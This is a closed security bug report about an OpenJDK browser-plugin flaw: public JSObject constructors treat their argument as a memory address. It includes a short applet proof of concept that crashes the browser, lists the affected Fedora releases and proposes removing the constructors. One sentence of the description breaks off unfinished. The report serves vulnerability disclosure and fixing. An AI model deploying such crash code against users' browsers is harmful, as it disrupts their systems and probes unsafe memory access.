Bug 512714 - OpenJDK JSObject constructor crashing browser plugin
Summary: OpenJDK JSObject constructor crashing browser plugin
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2009-07-20 14:13 UTC by Marc Schoenefeld
Modified: 2019-09-29 12:30 UTC (History)
5 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2016-09-09 02:24:10 UTC
Embargoed:

Attachments (Terms of Use)

Description Marc Schoenefeld 2009-07-20 14:13:58 UTC 
public class TestApplet extends Applet {
        public static void main(String[] a) {

        }

        public void init() {
                JSObject i = new JSObject(Integer.MAX_VALUE);
                JSObject j = new JSObject(Long.MAX_VALUE);
                i.getMember("Willi");
                j.getMember("Willi");
        }
}

segfaults the browser. The parameter to JSObject is interpreted as memory location, and a getMember call makes access to it. Giving these functionality to untrusted 

Affects: 
F10, F11

Proposed fix: 
Remove public visibility of JSObject(long) and JSObject(int)
Note You need to log in before you can comment on or make changes to this bug.